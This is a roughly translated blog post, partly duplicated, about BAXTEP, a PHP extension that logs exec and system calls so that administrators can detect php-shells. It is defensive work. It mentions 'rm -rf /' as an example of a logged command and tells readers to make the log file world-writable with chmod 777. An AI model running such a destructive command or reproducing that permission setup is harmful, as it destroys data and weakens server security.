Watchman: on guard system
"Once upon a time in the cold winter time,
We uploaded a mountain backdoor to the server ... ”
Folk Admin Works
')
In general, once on one of the servers, a php-shell was discovered, through which malicious hackers broke the cozy diary of a good person.
After a two-hour tinkering in the logs of Apache, there was a hole through which the shell was poured.
The hole was covered, the diary was brought back to life from backups, and they got a thought to think.
After the third bottle of beer, the idea was born: “Why not catch the execution of system calls from php scripts?”.
The point is that most php-shells somehow use the functions exec (); , system (); , shell_exec (); or passthru (); . Accordingly, the execution of these functions can be intercepted and quietly logged that such and such a number on such a line called the exec () function with the “rm -rf /” parameter.
No sooner said than done. The good man kastigar was delivered to those. task and work began to boil.
I’m not going to tell you how he picked up the subtleties of the Zend Engine, but in the end, an extension for PHP4 / PHP5 was born, codenamed BAXTEP.
Initially, we did not plan to lay out the code for general access, because everything was written in general “for ourselves” and “from and to” was not tested, but the open source spirit still took its toll - and the source code was posted on GoogleCode .
The extension supports PHP versions 4 and 5.
Requirements:
- packages for PHP4 / PHP5 development (php4-dev, php5-dev)
- gcc
- subversion
Pick up the source:
We collect:
After the build, we take out baxtep.so from the ./modules/ directory and put it in extension_dir, and in php.ini we add something like this:
Log file you need to create yourself. In addition, php scripts must have sufficient permissions to write to this file:
Everything, we restart Apache, write a test script and look at the log. There will be something like this:
Format:
UPD: l0rda assembled packages for CentOS 5 (i386 and x86_64), you can download it here: rpm.l0rda.biz/CentOS/5/RPMS/i386 , key: rpm.l0rda.biz/L0RDA-KEY
We uploaded a mountain backdoor to the server ... ”
Folk Admin Works
')
In general, once on one of the servers, a php-shell was discovered, through which malicious hackers broke the cozy diary of a good person.
After a two-hour tinkering in the logs of Apache, there was a hole through which the shell was poured.
The hole was covered, the diary was brought back to life from backups, and they got a thought to think.
After the third bottle of beer, the idea was born: “Why not catch the execution of system calls from php scripts?”.
The point is that most php-shells somehow use the functions exec (); , system (); , shell_exec (); or passthru (); . Accordingly, the execution of these functions can be intercepted and quietly logged that such and such a number on such a line called the exec () function with the “rm -rf /” parameter.
No sooner said than done. The good man kastigar was delivered to those. task and work began to boil.
I’m not going to tell you how he picked up the subtleties of the Zend Engine, but in the end, an extension for PHP4 / PHP5 was born, codenamed BAXTEP.
Initially, we did not plan to lay out the code for general access, because everything was written in general “for ourselves” and “from and to” was not tested, but the open source spirit still took its toll - and the source code was posted on GoogleCode .
Assembly and installation:
The extension supports PHP versions 4 and 5.
Requirements:
- packages for PHP4 / PHP5 development (php4-dev, php5-dev)
- gcc
- subversion
Pick up the source:
svn checkout http://baxtep.googlecode.com/svn/trunk/ baxtep
We collect:
cd baxtep
phpize
./configure
makeAfter the build, we take out baxtep.so from the ./modules/ directory and put it in extension_dir, and in php.ini we add something like this:
;;;;;;;;;;
; BAXTEP ;
;;;;;;;;;;
; Load extension
extension=baxtep.so
; Absolute path to logfile. File must exist and have write access for php
baxtep.logfile = "/tmp/baxtep_messages"Log file you need to create yourself. In addition, php scripts must have sufficient permissions to write to this file:
touch /tmp/baxtep_messages
chmod 777 /tmp/baxtep_messagesEverything, we restart Apache, write a test script and look at the log. There will be something like this:
2009-03-13 07:59:05 BAXTEP: system CMDLINE: `pwd` FILE: /var/www/html/test.php on line 5 URI: /test.phpFormat:
-- :: BAXTEP: CMDLINE: FILE: on line N URI: REQUEST_URIUPD: l0rda assembled packages for CentOS 5 (i386 and x86_64), you can download it here: rpm.l0rda.biz/CentOS/5/RPMS/i386 , key: rpm.l0rda.biz/L0RDA-KEY
Source: https://habr.com/ru/post/69790/
All Articles